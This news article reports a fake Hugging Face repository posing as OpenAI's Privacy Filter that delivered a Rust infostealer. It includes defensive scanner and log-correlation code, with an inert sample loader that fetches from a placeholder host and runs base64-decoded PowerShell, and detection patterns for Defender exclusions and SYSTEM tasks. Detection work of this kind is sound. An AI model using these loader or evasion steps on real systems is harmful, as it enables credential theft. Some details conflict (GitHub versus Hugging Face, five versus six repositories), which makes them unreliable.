A fake repository was discovered on the Hugging Face platform, posing as an official AI tool from OpenAI. In less than a day it became the top trending repository on the platform and recorded about 244,000 downloads, while infecting Windows systems with data-stealing malware.
The phishing repository climbed to the No. 1 spot on the Hugging Face trending list by reusing a near-identical name and description to OpenAI’s new “Privacy Filter”, which was published in late April 2026.
The repository delivered a Rust-based info-stealer targeting Windows users, which collected passwords, cryptocurrency wallets and seed phrases, Discord tokens and other personally identifiable information.
The attacker cloned the legitimate repository and copied everything, including the model card, model description, model architecture and documentation, into the new malicious repository. Once the attack was discovered, Hugging Face removed the malicious repository.
The Privacy Filter is an open-weight model developed by OpenAI to detect and remove private data in unstructured text. It is part of OpenAI’s effort to build tools that better protect privacy in AI systems by masking information such as email addresses and phone numbers.
As reported by HiddenLayer, the malicious repository included a Python file named loader.py, whose purpose is to download and execute malware on Windows systems.
“…the repository incorrectly used OpenAI’s legitimate release of their Privacy Filter. Almost all of their model card was identical and they included a loader.py file that will fetch & execute the infostealer malware on Windows computers when you run it,” said HiddenLayer researchers.
Users were instructed to “clone” the repository first and then run the loader: start.bat on Windows or loader.py on Linux/macOS. Once executed, loader.py initiated the infection chain.
Once initiated, loader.py disabled SSL certificate verification and called the JSONKeeper service, which returned a base64-encoded address that was passed to a PowerShell command for further actions.
Using JSONKeeper as a dead-drop resolver lets the attackers update payloads without touching the repository itself.
Next, loader.py downloaded a batch file from the api.eth-fastscan[.]org domain and executed it with cmd.exe.
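A defender-side check for the loader pattern described above, added here as an example (it is not HiddenLayer’s tooling and not code from the repository): a small static scanner that scores each script in a cloned model repository on the traits the article attributes to loader.py, such as TLS verification being disabled, base64 decoding, a JSONKeeper fetch, and hand-off to PowerShell or cmd.exe. The indicator weights, the alert threshold and the sample repository contents are all constructed for this illustration; the suspicious fixture is an inert skeleton that points at a reserved .invalid hostname.

```python
"""Static triage of helper scripts shipped with a model repository.

Added example (not HiddenLayer's or the repository's code). Scores each
script on traits the article attributes to loader.py: TLS verification
disabled, base64 decoding, a JSONKeeper dead-drop fetch, and hand-off to
PowerShell or cmd.exe. Weights and threshold are illustrative assumptions.
"""
import re
from dataclasses import dataclass, field

# (name, pattern, weight). Weights are assumptions chosen so that one
# sloppy trait alone (e.g. verify=False) stays below the alert threshold.
INDICATORS = [
    ("tls_verification_disabled",
     re.compile(r"verify\s*=\s*False|_create_unverified_context|CERT_NONE"), 3),
    ("base64_decode",
     re.compile(r"b64decode|FromBase64String|-EncodedCommand", re.I), 2),
    ("shell_execution",
     re.compile(r"\b(powershell|cmd\.exe|cmd\s*/c|subprocess\.(run|Popen|call)|os\.system)\b", re.I), 3),
    ("remote_fetch",
     re.compile(r"urlopen|requests\.get|Invoke-WebRequest|curl\s", re.I), 1),
    ("jsonkeeper_dead_drop",       # service named in the article
     re.compile(r"jsonkeeper", re.I), 2),
    ("runs_dropped_file",          # a .bat/.exe/.ps1 literal inside a command
     re.compile(r"\.(bat|exe|ps1)['\"]", re.I), 2),
]


@dataclass
class Finding:
    path: str
    score: int = 0
    hits: list = field(default_factory=list)


def scan_script(path: str, text: str) -> Finding:
    """Score one script; every matched indicator adds its weight."""
    finding = Finding(path)
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            finding.hits.append(name)
            finding.score += weight
    return finding


def scan_repo(files: dict, threshold: int = 6) -> list:
    """Scan script-like files and return findings at or above threshold,
    highest score first. Model weights, configs and docs are skipped."""
    scripts = {p: t for p, t in files.items() if p.endswith((".py", ".bat", ".ps1", ".sh"))}
    found = [scan_script(p, t) for p, t in scripts.items()]
    return sorted((f for f in found if f.score >= threshold), key=lambda f: -f.score)


# --- constructed sample repository (no real code from the incident) ---
BENIGN_CONVERT = '''
import json
from pathlib import Path
cfg = json.loads(Path("config.json").read_text())
print("layers:", cfg.get("num_hidden_layers"))
'''
SLOPPY_HELPER = '''
import requests
r = requests.get("https://huggingface.co/api/models", verify=False)  # careless, not a loader
print(r.status_code)
'''
SUSPICIOUS_LOADER = '''
import ssl, base64, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context  # TLS checks off
blob = urllib.request.urlopen("https://jsonkeeper.invalid/PLACEHOLDER").read()
cmd = base64.b64decode(blob).decode()
subprocess.run(["powershell", "-Command", cmd])
subprocess.run(["cmd.exe", "/c", "stage2.bat"])
'''
SAMPLE_REPO = {
    "README.md": "Model card text (constructed).",
    "config.json": '{"num_hidden_layers": 24}',
    "convert.py": BENIGN_CONVERT,
    "fetch_list.py": SLOPPY_HELPER,
    "loader.py": SUSPICIOUS_LOADER,
}

if __name__ == "__main__":
    for f in scan_repo(SAMPLE_REPO):
        print(f"{f.path}: score={f.score} hits={', '.join(f.hits)}")
```

The threshold matters: a careless `verify=False` in an otherwise harmless helper scores 4 and stays quiet, while a script that combines disabled TLS checks, a dead-drop fetch, base64 decoding and shell execution scores 13 and is the only file reported. Run the scanner over a freshly cloned repository before executing any start script it ships with.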
In the second stage, the batch script elevated privileges via UAC and added an exclusion for Microsoft Defender, then downloaded the next payload and created a scheduled task to run it.
At the end of its execution, the batch script deleted itself after 2 seconds.
Finally, the last payload was a Rust-based info-stealer that collected:
– user Discord data
– user cryptocurrency wallets and seed phrases
– user browser cookies and passwords
– FileZilla configuration files
– system information
– Chromium- and Gecko-based browser data
HiddenLayer also stated that the malware has no persistence mechanism: a single scheduled task runs under the SYSTEM account and then deletes itself before a restart.
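As an added example (not HiddenLayer’s detection logic), the second-stage behaviour described above can be turned into an endpoint detection: a Defender exclusion being added, a scheduled task created to run as SYSTEM, and a batch file deleting itself, all on one host within a short window. The process-creation records below are constructed, the Sysmon-style field names (ts, host, parent, cmdline) are an assumption, and the self-delete signature (a `del` of a .bat on the command line) is an assumed idiom rather than something the article specifies.

```python
"""Correlating second-stage behaviour in process-creation telemetry.

Added example, not HiddenLayer's detection logic. Looks for the three
actions the article attributes to the batch script (Defender exclusion
added, scheduled task created as SYSTEM, batch self-deletion) and alerts
when at least two of them occur on one host inside a short window.
Field names are Sysmon-like assumptions; the log lines are constructed.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

RULES = {
    "defender_exclusion_added":
        re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I),
    "scheduled_task_as_system":
        re.compile(r'schtasks(\.exe)?\s+/create\b.*\s/ru\s+"?(NT AUTHORITY\\)?SYSTEM\b', re.I),
    # assumed idiom for a batch file removing itself; not specified by the article
    "batch_self_delete":
        re.compile(r"\bdel\b[^&|]*\.bat", re.I),
}
WINDOW = timedelta(minutes=5)

# Constructed process-creation records, one JSON object per line.
# WS-01 shows the described chain; WS-02 is an admin doing routine work.
SAMPLE_LOG = r"""
{"ts": "2026-05-02T10:00:05", "host": "WS-01", "parent": "python.exe", "cmdline": "cmd.exe /c \"C:\\Users\\u\\Downloads\\stage1.bat\""}
{"ts": "2026-05-02T10:00:07", "host": "WS-01", "parent": "cmd.exe", "cmdline": "powershell.exe -Command Add-MpPreference -ExclusionPath C:\\Users\\u\\AppData\\Local\\Temp"}
{"ts": "2026-05-02T10:00:08", "host": "WS-01", "parent": "cmd.exe", "cmdline": "schtasks.exe /create /tn Updater /tr C:\\Users\\u\\AppData\\Local\\Temp\\stage2.exe /sc once /st 00:00 /ru SYSTEM"}
{"ts": "2026-05-02T10:00:10", "host": "WS-01", "parent": "cmd.exe", "cmdline": "cmd.exe /c timeout /t 2 & del \"C:\\Users\\u\\Downloads\\stage1.bat\""}
{"ts": "2026-05-02T11:30:00", "host": "WS-02", "parent": "explorer.exe", "cmdline": "powershell.exe Add-MpPreference -ExclusionPath C:\\Dev\\build"}
{"ts": "2026-05-02T11:31:00", "host": "WS-02", "parent": "explorer.exe", "cmdline": "schtasks /create /tn Backup /tr backup.exe /sc daily /ru CORP\\svc"}
"""


def parse_events(text: str) -> list:
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def match_rules(event: dict) -> list:
    """Names of rules whose pattern matches the event's command line."""
    return [name for name, rx in RULES.items() if rx.search(event["cmdline"])]


def correlate(events: list, window: timedelta = WINDOW, min_rules: int = 2) -> dict:
    """Return {host: sorted rule names} for hosts where at least min_rules
    distinct rules fire within `window` of each other."""
    hits = defaultdict(list)
    for ev in events:
        for name in match_rules(ev):
            hits[ev["host"]].append((datetime.fromisoformat(ev["ts"]), name))
    alerts = {}
    for host, seq in hits.items():
        seq.sort()
        best = set()
        # slide a window starting at each hit and keep the richest rule set
        for i, (start, _) in enumerate(seq):
            seen = {name for ts, name in seq[i:] if ts - start <= window}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_rules:
            alerts[host] = sorted(best)
    return alerts


if __name__ == "__main__":
    for host, rules in correlate(parse_events(SAMPLE_LOG)).items():
        print(f"ALERT {host}: {', '.join(rules)}")
```

Correlating rather than alerting on each event alone is the point: an administrator adding a Defender exclusion or creating a daily task for a service account trips one rule at most and stays below the threshold, while the three actions landing on one host within seconds of each other, spawned from the same cmd.exe lineage, is the chain the article describes.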
By the time the repository was blocked by GitHub, it had accumulated roughly 244,000 download records and 667 “likes” within the first 18 hours of its release. Researchers believe these numbers were most likely artificially inflated to give the project an appearance of popularity and credibility.
HiddenLayer also identified five additional repositories using a very similar Python loader:
– anthfu/Bonsai-8B-gguf
– anthfu/Qwen3.6-35B-A3B-APEX-GGU
– anthfu/DeepSeek-V4-Pro
– anthfu/Qwopus-GLM-18B-Merged-GGUF
– anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
– anthfu/supergemma4-26b-uncensored-gguf-v2
Researchers also determined that the api[.]eth-fastscan[.]org domain has been used for other malicious activity: it previously distributed the Windows executable o0q2l47f.exe and communicated with the welovechinatown[.]info C2 server. This infrastructure has been associated with the distribution of both ValleyRAT and Winos 4.0 via the trevlo npm package.
As Panther described earlier, that malicious npm package launched an obfuscated JavaScript loader that communicated with the attackers’ infrastructure using base64-encoded PowerShell commands to launch the next phase of the compromise.